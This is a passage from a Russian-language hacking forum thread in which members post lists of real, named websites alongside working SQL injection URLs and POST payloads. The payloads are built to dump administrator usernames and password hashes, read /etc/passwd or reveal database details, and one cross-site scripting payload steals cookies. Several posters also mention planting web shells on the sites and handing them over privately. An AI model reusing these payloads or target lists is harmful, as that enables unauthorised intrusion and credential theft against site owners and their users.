SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    ТИЦ700 PR9
    http://www.univie.ac.at/ANA/php/index3.php?n=-176+union+select+1,2,3,4,5,6,7,'/etc/passwd',9,10,11,12,13,14,15,16,17+--+
     
    3 people like this.
  2. x61

    x61 New Member

    Joined:
    28 Aug 2011
    Messages:
    4
    Likes Received:
    4
    Reputations:
    5

    pr2


    http://www.painton.co.il/page_e.php?id=-107+union+select+1,2,3,4,group_concat(name,0x3a,passward),6,7,8,9,10,11+from+users--


    pr2


    http://opr.co.il/page_e.php?id=-119+union+select+1,2,3,4,group_concat(name,0x3a,passward),6,7+from+users--



    http://net.cncnc.edu.cn/page_r.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+admin--



    pr1


    http://www.jugendfeuerwehr-kreis-ravensburg.de/page_r.php?id=-4+union+select+1,2,group_concat(name,0x3a,pass),4+from+zugriff--

    admin:
    main_r.php?id=10&expand_id=10


    http://architect.tbilisi.gov.ge/psite/page_c.php?id=-287+union+select+1,2,3,version()--



    Fédération Française de Basketball


    http://www.ffbb.com/_minibasket/page_a.php?d=actu&p=actu&id=3442"/><script>alert(document.cookie)</script>


    http://www.ffbb.com/_minibasket/page_a.php?d=actu&p=actu&id=3442+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version(),23--


    http://www.terrasana.net/page_i.php?id=-45+union+select+1,2,pass,4,5,6,7,8,9,10,11,12+from+ts_admin--
     
    2 people like this.
  3. x61

    x61 New Member

    Joined:
    28 Aug 2011
    Messages:
    4
    Likes Received:
    4
    Reputations:
    5
    http://www.egilplastics.com/enews.php?id=-24+union+select+1,group_concat(password,0x3a,sh),3,4,5,6,7,8+from+fk_admin--

    http://www.hdpe-butt-welding.com/enews.php?id=-24+union+select+1,group_concat(password,0x3a,sh),3,4,5,6,7,8+from+fk_admin--

    http://enoveragroup.com/anews.php?id=-9+union+select+group_concat(login,0x3a,password),2,3+from+user--

    http://www.actupix.net/tnews.php?op=tnews&id=-174+union+select+1,2,3,4,5,group_concat(login,0x3a,pass),7,8,9,10,11,12+from+users--

    http://www.burelfc.com/tnews.php?op=tnews&id=-174+union+select+1,2,3,4,5,group_concat(login,0x3a,pass),7,8,9,10,11,12+from+users--
     
    1 person likes this.
  4. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Давненько жирного не было =)

    Peoples.Ru​

    тИЦ 4600
    Pr 3
    Посещалка ~70-80k
    Из них РУ траф 50k

    HTML:
    http://music.peoples[xD].ru/search/?name=1%27and%281%3D0%29union%28select%281%29%2Cconcat_[system]ws%280x3a%2Cversion%28%29%2Cdatabase%28%29%2Cuser%28%29%2C%40%40version_compile_os%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%29%23
    P.S. На других поддоменах тоже много SQL-inj. Поэтому можете их не постить ;) Если шелл зальете, то обязательно отпишитесь в ПМ... Хорошо эксплуатируете SQL-inj, то тоже в ПМ, есть идейки)
     
    #14144 Kuteke, 7 Sep 2011
    Last edited: 7 Sep 2011
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    вроде как джумла... но охреневшая!!!
     
  6. MyGreenLife

    MyGreenLife Member

    Joined:
    27 Nov 2009
    Messages:
    0
    Likes Received:
    9
    Reputations:
    6
    Инфа в тайтле.
     
    1 person likes this.
  7. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    тиц 2000. пр 5.
    5.5.13-log

    тиц 850. пр 5.
    5.1.58
     
    2 people like this.
  8. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://www.ktsk.ru/index.php?id=[COLOR=Red]-[/COLOR]1[COLOR=Red]+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=0x7765626d6f72746f6e5f6b74736b --[/COLOR]
    Code:
    http://www.horncastlecivic.org.uk/worthies/details.php?id=[COLOR=Red]-[/COLOR]1[COLOR=Red]+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6+from+admin%20--[/COLOR]
    Code:
    http://www.yhmag.co.uk/comp_dets.php?id=1[COLOR=Red]+union+select+1,2,group_concat%28name,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+LUM_User%20--[/COLOR]
    Code:
    http://www.whoisintown.co.uk/town_stories.php?id=[COLOR=Red]-[/COLOR]1[COLOR=Red]+union+select+1,2,3,4,5,group_concat%28username,0x3a,password%29,7,8,9,10+from+members%20--[/COLOR]
    Code:
    http://www.jimmyeatworldlive.co.uk/demodetails.php?id=[COLOR=Red]-[/COLOR]1[COLOR=Red]+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11+--+[/COLOR]
     
    1 person likes this.
  9. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    тиц 1.5к, пр5. 8к-20к+ траф
    Code:
    url:http://www.stroyportal.ru/
    document.cookie="cookie_reg=-101 union+select+version()--"
    location.reload();
    5.5.7-rc-log
    phpAdsNew
    safe mode: ON Т____Т
    кому надо(д кому надо то...) шелл - в приват.
    -------------
    тиц 90, пр4, 6к+ траф.
    Code:
    www.play-today.ru/index.php?productID=39119+and+(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x 
    from information_schema.tables group by x)a)--+
    5.1.561
    WBS_USER
    upd:
    (шелл отдан)
     
    #14149 Melfis, 12 Sep 2011
    Last edited: 12 Sep 2011
  10. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Code:
    http://24rus.ru/more.php?UID=73389+or+1+group+by+concat%28version%28%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
    2к ТИЦ, всем фапать посоны! 191к паг в яше
    5 PR
     
    1 person likes this.
  11. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    27
    Likes Received:
    12
    Reputations:
    7
    getdota.com
    Code:
    http://www.getdota.com/app/getmap/
    POST:
    mirror_id=0&mirror_nr=2&file_name=DotA+v6.72f.w3x&as_zip=0&language=en&map_id=501&language_id=2 and(select min(@:=1)from (select 1 union select 2)k group by concat((select concat_ws(0x3a,user_id,login,pass)from users limit 0,1),@:=@-1))
    
     
    3 people like this.
  12. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Code:
    http://www.tdgalion.ru/keramogranit.php?sizecol=72+union+select+table_name,2,3,4,5,6,7,8+from+information_schema.tables+limit+0,1--+
    user:[email protected]
    database:u259236_2
    version:5.0.90-log
    1100 ТИЦ
    5 PR
     
  13. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    Code:
    http://www.bmsk.ru/news.php?id=-653+union+select+1,2,3,4,group_concat%28version%28%29,0x3a,user%28%29,0x3a,database%28%29%29,6,7,8,9,10,11--
    вывод в исходнике <meta name
     
  14. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    Code:
    http://wmhistory.com/passport.php?id=-11638+union+select+1,version(),3,4,5,6--
    Version: 5.0.51a-24+lenny5
     
  15. x61

    x61 New Member

    Joined:
    28 Aug 2011
    Messages:
    4
    Likes Received:
    4
    Reputations:
    5
    http://www.naturaleshop.gr/prod.php?id=1+union+select+null,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+Accounts--


    http://petguide.gr/prod.php?id=-412+union+select+null,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,13,13,14,15+from+Accounts--


    http://www.petshopmarket.gr/prod.php?id=1+union+select+null,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+Accounts--
     
  16. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173

    нашёл Boobby (Taimas)


    прочитать домен
     
  17. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    http://www.seasideheightstourism.com/single_event.php?id=84+and+1=0+union+select+1,concat_ws(0x3a,username,password),3,4+from+member_login--

    http://sms.dovrecka.sk/sms.php?id=3964+and+1=0+union+select+1,2,3,concat_ws(0x3a,version(),user()),5,6,7,8,9--


    Не оффтопь
     
    #14157 t3cHn0iD, 14 Sep 2011
    Last edited: 14 Sep 2011
  18. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://slv.ufanet.ru/component/ufanetdvbclist/?task=package&package=76&pid=0&cid=30

    не тупи
     
  19. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    1к трафа
    Code:
    http://baraholka43.ru/page.php?page=125+union+select+1,version()--+
    5.0.51a-24+lenny2+spu1-log
    ______________
    4к+ траф, пр5, тиц450.
    Code:
    http://www.gmsn.ru/page.php?rub=news&id=-254'+union+select+1,2,(select unhex(hex(version()))),4,5,6,7,8--+
    4.1.16-1.gms
    ______________
    траф 1к+, тиц200, п4.
    Code:
    http://www.mozhaysk.ru/index.php?tp=-bndom%27+union+all+select+1,2,version(),4--+
    вывод в коде.
    5.1.50-log
     
    1 person likes this.
  20. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Это у тебя вообще раскрытие пути >_<.Извиняюсь за оффтоп.
     
    1 person likes this.
Thread Status:
Not open for further replies.